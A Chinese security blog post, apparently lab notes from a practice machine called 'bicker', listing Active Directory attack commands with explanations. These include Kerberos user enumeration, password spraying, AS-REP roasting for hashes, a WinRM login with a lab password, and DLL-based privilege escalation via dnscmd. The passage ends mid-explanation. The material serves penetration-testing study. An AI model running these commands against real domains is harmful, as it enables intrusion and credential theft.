<!doctype html>
<html lang="zh"><head>
<title>X8@0E的博客</title>
<meta charset="UTF-8">
<meta name="keywords" content="">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<meta name="description" content="dig 查询 SRV 记录(bicker)通过 dig 查询 SRV 记录，可以精确地确认提供关键服务的服务器主机名。 1dig @192.168.196.129 -t SRV _kerberos._tcp.bicker.com   &#x2F;&#x2F;向IP为 192.168.196.129 的DNS服务器查询域 bicker.com 中Kerberos身份验证服务的详细网络位置信息。  12345678910">
<meta property="og:type" content="article">
<meta property="og:title" content="X8@0E的博客">
<meta property="og:url" content="http://example.com/2025/08/21/3.%E5%9F%9F%E6%8E%A7%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4/index.html">
<meta property="og:site_name" content="X8@0E的博客">
<meta property="og:description" content="dig 查询 SRV 记录(bicker)通过 dig 查询 SRV 记录，可以精确地确认提供关键服务的服务器主机名。 1dig @192.168.196.129 -t SRV _kerberos._tcp.bicker.com   &#x2F;&#x2F;向IP为 192.168.196.129 的DNS服务器查询域 bicker.com 中Kerberos身份验证服务的详细网络位置信息。  12345678910">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-08-21T12:18:00.964Z">
<meta property="article:modified_time" content="2025-09-18T07:50:48.597Z">
<meta property="article:author" content="X8@0E">
<meta name="twitter:card" content="summary">

<link rel="stylesheet" href="/lib/fancybox/fancybox.css">
<link rel="stylesheet" href="/lib/mdui_043tiny/mdui.css">


<link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1761991220282">

<link rel="stylesheet" href="/css/style.css?v=1761991220282">




    
        <link rel="stylesheet" href="/custom.css?v=1761991220282">
    



<script src="/lib/mdui_043tiny/mdui.js" async></script>
<script src="/lib/fancybox/fancybox.umd.js" async></script>
<script src="/lib/lax.min.js" async></script>


<script async src="/js/app.js?v=1761991220282"></script>

 

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4D4ZJ9G024"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag("js", new Date());

  gtag("config", "G-4D4ZJ9G024");
</script>


<link rel="stylesheet"  href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark.min.css">
<meta name="generator" content="Hexo 7.3.0"></head><body class="nexmoe mdui-drawer-body-left"><div id="nexmoe-background"><div class="nexmoe-bg" style="background-image: url(https://img-baofun.zhhainiao.com/pcwallpaper_ugc/static/55f0c32a6a773efe8c6a6a8158a06f18.jpg?x-oss-process=image%2fresize%2cm_lfit%2cw_1920%2ch_1080)"></div><div class="mdui-appbar mdui-shadow-0"><div class="mdui-toolbar"><a class="mdui-btn mdui-btn-icon mdui-ripple" mdui-drawer="{target: &#039;#drawer&#039;, swipe: true}" title="menu"><i class="mdui-icon nexmoefont icon-menu"></i></a><div class="mdui-toolbar-spacer"></div><a class="mdui-btn mdui-btn-icon" href="/" title="X8@0E"><img src="https://n.sinaimg.cn/sinakd20119/560/w1080h1080/20220924/802a-0c9750f1fa5aa25624c0847a082aaba1.jpg" alt="X8@0E"></a></div></div></div><div id="nexmoe-header"><div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="X8@0E">
            <img src="https://n.sinaimg.cn/sinakd20119/560/w1080h1080/20220924/802a-0c9750f1fa5aa25624c0847a082aaba1.jpg" alt="X8@0E" alt="X8@0E">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>43</div>
        <div><span>标签</span>77</div>
        <div><span>分类</span>14</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/archives.html" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-douban-fill"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
    </div>
    
    
        
        <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        
            <form id="search_form">
                <label><input class="st-default-search-input" id="search_value" name="q" type="search" placeholder="搜索" style="
                    font-size: 15px !important;
                    height: 56px !important;
                    background-image: none;
                "></label>
            </form>
         
    </div>
</div>


	<script async src="/js/search.js?v=1761991220283"></script>



    
        
        <div class="nexmoe-widget-wrap">
	<div class="nexmoe-widget nexmoe-social">
		<a
			class="mdui-ripple"
			href="https://blog.csdn.net/2301_81325456/article/details/147025965"
			target="_blank"
			mdui-tooltip="{content: 'CSDN'}"
			style="
				color: rgb(247, 132, 34);
				background-color: rgba(247, 132, 34, .1);
			"
		>
			<i
				class="nexmoefont icon-github"
			></i> </a
		>
	</div>
</div>

    
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Crypto/">Crypto</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/NSSCTF/">NSSCTF</a>
          <span class="category-list-count">2</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Vulnhub/">Vulnhub</a>
          <span class="category-list-count">3</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Vulnvm靶机复现/">Vulnvm靶机复现</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-信息收集/">ctfshow-web-信息收集</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-命令执行/">ctfshow-web-命令执行</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-文件上传/">ctfshow-web-文件上传</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-文件包含/">ctfshow-web-文件包含</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-爆破/">ctfshow-web-爆破</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/sql注入/">sql注入</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/vulhub/">vulhub</a>
          <span class="category-list-count">7</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/vulnhub/">vulnhub</a>
          <span class="category-list-count">4</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/群友靶机/">群友靶机</a>
          <span class="category-list-count">15</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/自制靶机/">自制靶机</a>
          <span class="category-list-count">1</span>
        </li>

        
      </ul>

    </div>
  </div>


    
        
        
  <div class="nexmoe-widget-wrap">
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/1Panel/" style="font-size: 10px;">1Panel</a> <a href="/tags/3%E4%B8%AA%E7%82%B9/" style="font-size: 10px;">3个点</a> <a href="/tags/Argon2Cracker/" style="font-size: 10px;">Argon2Cracker</a> <a href="/tags/Cookie-GLOBALS/" style="font-size: 10px;">Cookie--GLOBALS</a> <a href="/tags/Cypher%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">Cypher注入</a> <a href="/tags/DC/" style="font-size: 15px;">DC</a> <a href="/tags/GIF%E7%BB%95%E8%BF%87/" style="font-size: 10px;">GIF绕过</a> <a href="/tags/Jinja2/" style="font-size: 10px;">Jinja2</a> <a href="/tags/JoomScan/" style="font-size: 10px;">JoomScan</a> <a href="/tags/LFI%E5%88%B0RCE-open%E5%87%BD%E6%95%B0/" style="font-size: 10px;">LFI到RCE(open函数)</a> <a href="/tags/NSSCTF/" style="font-size: 15px;">NSSCTF</a> <a href="/tags/Nginx%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">Nginx解析漏洞</a> <a href="/tags/RSA/" style="font-size: 10px;">RSA</a> <a href="/tags/RUNPATH/" style="font-size: 10px;">RUNPATH</a> <a href="/tags/Rabbit/" style="font-size: 10px;">Rabbit</a> <a href="/tags/SSRF/" style="font-size: 10px;">SSRF</a> <a href="/tags/Vulnhub/" style="font-size: 15px;">Vulnhub</a> <a href="/tags/Vulnvm/" style="font-size: 10px;">Vulnvm</a> <a href="/tags/WAF/" style="font-size: 10px;">WAF</a> <a href="/tags/WPA-01-cap/" style="font-size: 10px;">WPA-01.cap</a> <a href="/tags/aircrack-ng/" style="font-size: 10px;">aircrack-ng</a> <a href="/tags/basic%E8%AE%A4%E8%AF%81%E7%88%86%E7%A0%B4/" style="font-size: 10px;">basic认证爆破</a> <a href="/tags/cgi%E6%96%87%E4%BB%B6/" style="font-size: 10px;">cgi文件</a> <a href="/tags/ctfshow/" style="font-size: 20px;">ctfshow</a> <a href="/tags/dirtycow/" style="font-size: 10px;">dirtycow</a> <a href="/tags/docker%E4%BA%A4%E4%BA%92%E5%BC%8Fshell/" style="font-size: 10px;">docker交互式shell</a> <a href="/tags/drupal/" style="font-size: 10px;">drupal</a> <a href="/tags/ffuf/" style="font-size: 10px;">ffuf</a> <a href="/tags/flask/" style="font-size: 10px;">flask</a> <a href="/tags/fork%E8%A7%A3%E5%86%B3%E6%96%AD%E8%BF%9E/" style="font-size: 10px;">fork解决断连</a> <a href="/tags/ftp/" style="font-size: 10px;">ftp</a> <a href="/tags/ghfs/" style="font-size: 10px;">ghfs</a> <a href="/tags/ldd/" style="font-size: 10px;">ldd</a> <a href="/tags/les-sh/" style="font-size: 10px;">les.sh</a> <a href="/tags/linpeas-sh/" style="font-size: 10px;">linpeas.sh</a> <a href="/tags/lsattr-%E6%9F%A5%E7%9C%8B%E6%96%87%E4%BB%B6%E6%89%A9%E5%B1%95%E5%B1%9E%E6%80%A7/" style="font-size: 10px;">lsattr--查看文件扩展属性</a> <a href="/tags/motto/" style="font-size: 10px;">motto</a> <a href="/tags/msfvenom/" style="font-size: 15px;">msfvenom</a> <a href="/tags/mysql-old-password/" style="font-size: 10px;">mysql_old_password</a> <a href="/tags/nikto/" style="font-size: 10px;">nikto</a> <a href="/tags/nohup/" style="font-size: 10px;">nohup</a> <a href="/tags/php%E6%8F%90%E6%9D%83root/" style="font-size: 10px;">php提权root</a> <a href="/tags/poc/" style="font-size: 10px;">poc</a> <a href="/tags/put%E6%96%B9%E6%B3%95/" style="font-size: 10px;">put方法</a> <a href="/tags/python3-5/" style="font-size: 10px;">python3.5</a> <a href="/tags/rce/" style="font-size: 10px;">rce</a> <a href="/tags/readelf/" style="font-size: 10px;">readelf</a> <a href="/tags/scp/" style="font-size: 10px;">scp</a> <a href="/tags/sqlmap/" style="font-size: 10px;">sqlmap</a> <a href="/tags/sql%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">sql二次注入</a> <a href="/tags/ssh%E5%BC%B1%E5%8F%A3%E4%BB%A4%E7%88%86%E7%A0%B4/" style="font-size: 10px;">ssh弱口令爆破</a> <a href="/tags/ssh%E7%A7%98%E9%92%A5%E7%94%9F%E6%88%90%E8%BF%9E%E6%8E%A5/" style="font-size: 10px;">ssh秘钥生成连接</a> <a href="/tags/stegseek/" style="font-size: 10px;">stegseek</a> <a href="/tags/suForce/" style="font-size: 10px;">suForce</a> <a href="/tags/url%E6%88%AA%E6%96%AD/" style="font-size: 10px;">url截断</a> <a href="/tags/vite/" style="font-size: 10px;">vite</a> <a href="/tags/web%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" style="font-size: 10px;">web命令执行</a> <a href="/tags/web%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 10px;">web文件上传</a> <a href="/tags/web%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" style="font-size: 10px;">web文件包含</a> <a href="/tags/web%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2/" style="font-size: 10px;">web源码泄露</a> <a href="/tags/web%E7%88%86%E7%A0%B4/" style="font-size: 10px;">web爆破</a> <a href="/tags/x-forwarded-for%E7%9A%84ip%E6%AC%BA%E9%AA%97/" style="font-size: 10px;">x-forwarded-for的ip欺骗</a> <a href="/tags/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E-CVE-2025-30208/" style="font-size: 10px;">任意文件读取漏洞(CVE-2025-30208)</a> <a href="/tags/%E5%87%AF%E6%92%92%E5%AF%86%E7%A0%81/" style="font-size: 10px;">凯撒密码</a> <a href="/tags/%E5%90%8E%E9%9D%A2%E5%8A%A0-jpg%E5%90%8E%E7%BC%80/" style="font-size: 10px;">后面加.jpg后缀</a> <a href="/tags/%E5%9F%9F%E6%8E%A7/" style="font-size: 10px;">域控</a> <a href="/tags/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4/" style="font-size: 10px;">密码爆破</a> <a href="/tags/%E6%8F%90%E6%9D%83-env-reset/" style="font-size: 10px;">提权!env_reset</a> <a href="/tags/%E6%8F%92%E4%BB%B6%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">插件漏洞</a> <a href="/tags/%E6%97%A5%E5%BF%97%E6%B3%A8%E5%85%A5-ua%E6%B7%BB%E5%8A%A0%E6%9C%A8%E9%A9%AC/" style="font-size: 10px;">日志注入+ua添加木马</a> <a href="/tags/%E6%AD%A3%E5%90%91shell/" style="font-size: 10px;">正向shell</a> <a href="/tags/%E7%8A%B6%E6%80%81%E7%A0%81/" style="font-size: 10px;">状态码</a> <a href="/tags/%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F/" style="font-size: 10px;">环境变量</a> <a href="/tags/%E7%A9%BA%E6%A0%BC/" style="font-size: 10px;">空格</a> <a href="/tags/%E7%BB%B4%E5%90%89%E5%B0%BC%E4%BA%9A%E5%AF%86%E7%A0%81/" style="font-size: 10px;">维吉尼亚密码</a> <a href="/tags/%E8%9A%81%E5%89%91/" style="font-size: 10px;">蚁剑</a> <a href="/tags/%E8%B6%8A%E7%95%8C%E8%AF%BB%E5%8F%96/" style="font-size: 10px;">越界读取</a>
    </div>
    
      <script>
        var maxTagcloud = parseInt(17);
        var tags_length = parseInt(77);
        var tags_arr = [];
        for(var i = 0; i < tags_length; i++){
          tags_arr.push(i);
        }
        tags_arr.sort(function (l, r) {
          return Math.random() > 0.5 ? -1 : 1;
        });
        tags_arr = tags_arr.slice(0, maxTagcloud < tags_length ? tags_length - maxTagcloud : 0);
        for(var tag_i = 0; tag_i < tags_arr.length; tag_i++){
          document.getElementById("randomtagcloud").children[tags_arr[tag_i]].style.display = 'none';
        }
      </script>
    
  </div>

    
        
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/">2025</a><span class="archive-list-count">43</span></li></ul>
    </div>
  </div>



    
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">最新文章</h3>
    <div class="nexmoe-widget">
      <ul>
        
          <li>
            <a href="/2025/10/20/Crypto/">Crypto</a>
          </li>
        
          <li>
            <a href="/2025/10/11/%E6%B5%81%E9%87%8F%E6%81%B6%E6%84%8F%E6%94%BB%E5%87%BB/">流量分析恶意攻击</a>
          </li>
        
          <li>
            <a href="/2025/10/10/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">流量分析</a>
          </li>
        
          <li>
            <a href="/2025/10/09/hackableII/">hackablell</a>
          </li>
        
          <li>
            <a href="/2025/10/07/Me-and-My-Girlfriend-1/">Me-and-My-Girlfriend-1</a>
          </li>
        
      </ul>
    </div>
  </div>

    
        
        <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-link">
		<ul>
        
            <li>
                <a href="" target="_blank" >
                    <img src="https://n.sinaimg.cn/sinakd20119/560/w1080h1080/20220924/802a-0c9750f1fa5aa25624c0847a082aaba1.jpg" alt="X8@0E"></img>
                    <p>X8@0E</p>
                </a>
            </li>
        
		</ul>
    </div>
</div>
<style>
.nexmoe-widget-wrap .nexmoe-link ul li a {
    text-align : center;
}
.nexmoe-widget-wrap .nexmoe-link ul li a img {
    max-width : 100%;
}
.nexmoe-widget-wrap .nexmoe-link ul li a p {
    margin: 10px 0;
}
</style>

    
   
    <div class="nexmoe-copyright">
        &copy; 2025 X8@0E
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        
    </div>
</div><!-- .nexmoe-drawer --></div><div id="nexmoe-content"><div class="nexmoe-primary"><div class="nexmoe-post">
  <article>
    
        <div class="nexmoe-post-cover"> 
            <img src="https://img-baofun.zhhainiao.com/pcwallpaper_ugc/static/55f0c32a6a773efe8c6a6a8158a06f18.jpg?x-oss-process=image%2fresize%2cm_lfit%2cw_1920%2ch_1080" alt="" loading="lazy">
            <h1></h1>
        </div>
    
    
    <div class="nexmoe-post-meta">
    <div class="nexmoe-rainbow">
        <a class="nexmoefont icon-calendar-fill">2025年08月21日</a>
        
        
    </div>
    
    
    
    
    
</div>

    <h1 id="dig-查询-SRV-记录-bicker"><a href="#dig-查询-SRV-记录-bicker" class="headerlink" title="dig 查询 SRV 记录(bicker)"></a>dig 查询 SRV 记录(bicker)</h1><p>通过 dig 查询 SRV 记录，可以精确地确认提供关键服务的服务器主机名。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dig @192.168.196.129 -t SRV _kerberos._tcp.bicker.com   //向IP为 192.168.196.129 的DNS服务器查询域 bicker.com 中Kerberos身份验证服务的详细网络位置信息。</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">dig是一个强大的命令行工具，用于查询DNS（域名系统）服务器，获取域名相关的信息。它是系统管理员进行网络诊断和故障排除的常用工具。</span><br><span class="line"></span><br><span class="line">@192.168.205.149作用：指定要查询的目标DNS服务器。</span><br><span class="line"></span><br><span class="line">-t：选项用于指定要查询的DNS记录类型。</span><br><span class="line">SRV：Service（服务）记录的缩写。这是一种特殊的DNS记录，用于指定提供特定服务的服务器的主机名和端口号。它比简单的A记录或CNAME记录提供的信息更丰富。</span><br><span class="line"></span><br><span class="line">_kerberos._tcp.bicker.com（_服务名._传输协议.域名）</span><br><span class="line">这是要查询的SRV记录的具体名称。它的结构是标准的，</span><br><span class="line">遵循 _服务名._传输协议.域名 的格式：</span><br><span class="line"></span><br><span class="line">_kerberos：表示服务是 Kerberos。这是一种网络身份验证协议，用于在非安全的网络环境中，对个人通信以安全的手段进行身份认证。Windows域认证、MIT Kerberos等都使用它。Active Directory域的核心服务之一就是Kerberos。</span><br><span class="line"></span><br><span class="line">_tcp：表示该服务使用 TCP 协议进行通信。</span><br><span class="line"></span><br><span class="line">bicker.com：表示查找服务于 bicker.com 这个域的Kerberos服务器。</span><br><span class="line"></span><br><span class="line">这个指令的用途：</span><br><span class="line">域加入或身份验证：当一台计算机（尤其是Windows机器或Linux客户端）试图加入 bicker.com 域时，它需要知道域控制器（KDC - Key Distribution Center）的位置。它可以通过查询这个 _kerberos._tcp.bicker.com SRV记录来自动发现域控制器。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">上面指令返回的结果：</span><br><span class="line">...........</span><br><span class="line">_kerberos._tcp.bicker.com. 600  IN      SRV     0 100 88 dc.bicker.com.</span><br><span class="line">...........</span><br><span class="line"></span><br><span class="line">0：优先级。数字越小，优先级越高。客户端会先尝试连接优先级为0的服务器。</span><br><span class="line"></span><br><span class="line">100：权重。在优先级相同的情况下，权重越高的服务器被选中的概率越大。</span><br><span class="line"></span><br><span class="line">88：端口号。提供服务的目标端口。(Kerberos默认端口是88，但SRV记录可以指定非标准端口)</span><br><span class="line"></span><br><span class="line">dc.bicker.com.：目标主机。真正提供Kerberos服务的服务器的主机名。客户端之后需要再通过A或AAAA记录查询这些主机名对应的IP地址。</span><br></pre></td></tr></table></figure>

<h1 id="LDAP-–信息收集与侦察-bicker"><a href="#LDAP-–信息收集与侦察-bicker" class="headerlink" title="LDAP –信息收集与侦察(bicker)"></a>LDAP –信息收集与侦察(bicker)</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ldapsearch -x -H ldap://192.168.196.129 -b <span class="string">&quot;DC=bicker,DC=com&quot;</span>   //尝试匿名连接到 192.168.196.129 这台LDAP服务器，并从 bicker.com 域的根目录开始，搜索其下的所有条目。</span><br></pre></td></tr></table></figure>

<p>LDAP 匿名绑定探测的主要用途是：发现并识别那些配置不当、允许匿名访问的LDAP目录服务，从而为进一步的信息收集和潜在的攻击打开突破口。</p>
<h1 id="Kerberos用户名枚举-bicker"><a href="#Kerberos用户名枚举-bicker" class="headerlink" title="Kerberos用户名枚举(bicker)"></a>Kerberos用户名枚举(bicker)</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerbrute userenum --dc 192.168.196.132 -d bicker.com /usr/share/seclists/Usernames/cirt-default-usernames.txt</span><br></pre></td></tr></table></figure>

<p>它的核心用途是：在无需有效密码的情况下，确认一个或多个用户名在目标域中是否存在。</p>
<h2 id="Kerbrute"><a href="#Kerbrute" class="headerlink" title="Kerbrute"></a>Kerbrute</h2><p>这是一个专门用于快速 Kerberos 枚举和密码喷洒的 Go 语言工具，速度极快。</p>
<p><strong>用途</strong>：<strong>用户名枚举</strong>和<strong>密码喷洒</strong>。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 用户名枚举</span></span><br><span class="line">kerbrute userenum --dc &lt;靶机DC_IP&gt; -d &lt;域名DOMAIN&gt; usernames.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># 密码喷洒</span></span><br><span class="line">kerbrute passwordspray --dc &lt;靶机DC_IP&gt; -d &lt;域名DOMAIN&gt; users.txt Password123</span><br></pre></td></tr></table></figure>

<p><strong>一开始kali没有kerbrute需要安装</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">apt update</span><br><span class="line">apt install golang-go</span><br><span class="line">go <span class="built_in">env</span> -w GOPROXY=https://goproxy.cn,direct  //设置 GOPROXY 环境变量（七牛云镜像）</span><br><span class="line">go <span class="built_in">env</span> -w GOSUMDB=sum.golang.google.cn  //设置 GOSUMDB,避免校验错误</span><br><span class="line">go install github.com/ropnop/kerbrute@latest  //安装 kerbrute</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">cp</span> ~/go/bin/kerbrute /usr/local/bin/  //默认安装到~/go/bin目录下，将可执行文件移动到系统路径（方便在任何地方调用），这里用<span class="built_in">mv</span>也可以。</span><br><span class="line">kerbrute -h  //测试是否安装成功，用<span class="built_in">which</span> kerbrute也可以</span><br></pre></td></tr></table></figure>

<h1 id="AS-REP-Roasting-攻击尝试-bicker"><a href="#AS-REP-Roasting-攻击尝试-bicker" class="headerlink" title="AS-REP Roasting*攻击尝试(bicker)"></a>AS-REP Roasting*攻击尝试(bicker)</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py bicker.com/ -dc-ip 192.168.196.135 -usersfile user -format hashcat -outputfile <span class="built_in">hash</span></span><br></pre></td></tr></table></figure>

<p>针对 <strong>Kerberos 协议</strong>的攻击，其核心是<strong>利用域账户配置了 “不要求预认证” (Do not require Kerberos preauthentication)</strong> 这一安全策略弱点。</p>
<h3 id="攻击前提条件"><a href="#攻击前提条件" class="headerlink" title="攻击前提条件"></a>攻击前提条件</h3><ol>
<li><p>发现域中存在设置了 <strong><code>DONT_REQ_PREAUTH</code></strong> 属性的用户账户。</p>
</li>
<li><p>你能够与域控制器（KDC）的 88 端口通信。(主要是这个要保证)</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvz 192.168.196.135 88  //靶机IP</span><br></pre></td></tr></table></figure></li>
</ol>
<h4 id="第-1-步：发现易受攻击的用户"><a href="#第-1-步：发现易受攻击的用户" class="headerlink" title="第 1 步：发现易受攻击的用户"></a>第 1 步：发现易受攻击的用户</h4><p>此命令会尝试枚举用户并获取那些禁用预认证的用户的 AS-REP 哈希。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GetNPUsers.py &lt;域名&gt;/ -dc-ip &lt;域控制器IP&gt; -request -outputfile hashes.asreproast   //基本命令</span><br></pre></td></tr></table></figure>

<h1 id="SMB匿名共享探测-bicker"><a href="#SMB匿名共享探测-bicker" class="headerlink" title="SMB匿名共享探测(bicker)"></a>SMB匿名共享探测(bicker)</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient -L //192.168.196.135 -N</span><br></pre></td></tr></table></figure>

<p>在不提供用户名和密码的情况下，匿名查询 IP 地址为 <code>192.168.196.135</code> 的 SMB 服务器上都有哪些可用的共享文件夹。</p>
<h1 id="WinRM-服务获得shell-bicker"><a href="#WinRM-服务获得shell-bicker" class="headerlink" title="WinRM 服务获得shell(bicker)"></a>WinRM 服务获得shell(bicker)</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 192.168.196.135 -u <span class="string">&#x27;tindalos&#x27;</span> -p <span class="string">&#x27;Th3C@ll0fCtHu1hu!&#x27;</span>   //使用用户名 tindalos 和密码 Th3C@ll0fCtHu1hu!，通过 WinRM 协议连接到 IP 地址为 192.168.196.135 的 Windows 服务器。</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm: 工具本身的名称。</span><br><span class="line">-i 192.168.205.149: -i 参数指定要连接的目标主机的 IP 地址。</span><br><span class="line">-u &#x27;tindalos&#x27;: -u 参数指定用于身份验证的用户名。</span><br><span class="line">-p &#x27;Th3C@ll0fCtHu1hu!&#x27;: -p 参数指定对应用户名的密码。</span><br></pre></td></tr></table></figure>

<h1 id="域控提权–dnscmd-exe-bicker"><a href="#域控提权–dnscmd-exe-bicker" class="headerlink" title="域控提权–dnscmd.exe(bicker)"></a>域控提权–dnscmd.exe(bicker)</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dnscmd.exe localhost /config /serverlevelplugindll C:\Users\tindalos\Documents\dns.dll</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">使用 dnscmd.exe 将其注册为ServerLevelPluginDll 。</span><br><span class="line"></span><br><span class="line">dnscmd.exe:</span><br><span class="line">是什么：一个官方的 Windows 服务器管理工具，用于在命令行下配置和管理 DNS 服务器角色。它位于 %windir%\System32\ 下，是合法且签名的微软程序。</span><br><span class="line">为什么用它：攻击者使用合法、可信的系统管理工具来执行恶意操作，这种技术被称为 “Living Off The Land” (LOLBins)。这种行为可以绕过应用程序白名单策略，并且看起来很像正常的系统管理活动，极大降低了被安全软件检测和人工发现的风险。</span><br><span class="line"></span><br><span class="line">localhost:</span><br><span 